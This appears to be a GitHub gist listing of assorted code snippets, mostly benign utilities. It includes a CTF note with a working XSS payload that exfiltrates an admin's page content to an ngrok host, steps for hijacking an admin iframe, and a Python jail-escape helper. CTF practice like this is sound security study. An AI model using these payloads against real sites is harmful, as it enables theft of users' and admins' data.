Solutions of https://xss.pwnfunction.com/
Dom-Based XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| txt = [int(t,2) for t in '01001000 01100001 01110000 01110000 01111001 00100000 01000010 01101001 01110010 01110100 01101000 01100100 01100001 01111001'.split()] | |
| print ''.join([binascii.unhexlify('%x' % c) for c in txt]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from base64 import b64decode | |
| import pprint | |
| story1 = ''' | |
| It's somewhat dark in here, but the walls (unbroken except for the door by | |
| which I entered) encircle an area no more than eight feet in diameter. | |
| It's horribly dank and dusty--no one can have been in here for years. | |
| Is that an open envelope over there on the floor? | |
| It seems there is a letter inside. Thank heavens it's in English. |
diofeher
/ pyjail_breaker.py
Created
January 24, 2019 02:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """Look for builtins...""" | |
| import types | |
| def is_builtins(v): | |
| """Does v seem to be the builtins?""" | |
| if hasattr(v, "open") and hasattr(v, "__import__"): | |
| return True | |
| if isinstance(v, dict): | |
| return "open" in v and "__import__" in v |
diofeher
/ fib_memo_decorator.py
Created
December 16, 2019 23:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Memoization(object): | |
| def __init__(self, func): | |
| self.func = func | |
| self.data = {} | |
| def __call__(self, n, **kwargs): | |
| if n in self.data: | |
| return self.data[n] | |
| self.data[n] = self.func(n) |
diofeher
/ xss.pwnfunctions.md
Last active
August 16, 2024 19:33
diofeher
/ mynotes-bytebandits.md
Last active
April 12, 2020 15:52
First - XSS on the User
<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>
Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:
- Log out
- Login with your XSS user
- Control the admin iframe with XSS and exfiltrate the data
diofeher
/ desafio_logica.py
Created
April 30, 2020 17:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from z3 import Solver, Ints, Or, And, Not, sat | |
| x, y, z = Ints('x y z') | |
| s = Solver() | |
| s.add(x >= 0, x <= 9) | |
| s.add(y >= 0, y <= 9) | |
| s.add(z >= 0, z <= 9) |
diofeher
/ installing_go.sh
Last active
June 30, 2020 14:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Installing Go environment on MAC + Visual Studio Code + Oh my ZSH | |
| brew install go | |
| cat <<EOT >> $HOME/.zshrc | |
| export GOROOT="/usr/local/Cellar/go/1.14.4/libexec/" | |
| export GOPATH="$HOME/workspace/go" | |
| export PATH="${PATH}:${GOPATH}:${GOPATH}/bin" | |
| EOT | |
| source $HOME/.zshrc |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # concatenate two images with different sizes | |
| convert image1.jpeg image2.jpeg -gravity Center -resize 800x200 +append output.jpeg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {{- /* Template based on https://docs.gitlab.com/ee/user/application_security/container_scanning/#reports-json-format */ -}} | |
| { | |
| "version": "11.0.0", | |
| "vulnerabilities": [ | |
| {{- $t_first := true }} | |
| {{- range . }} | |
| {{- $target := .Target }} | |
| {{- range .Vulnerabilities -}} | |
| {{- if $t_first -}} | |
| {{- $t_first = false -}} |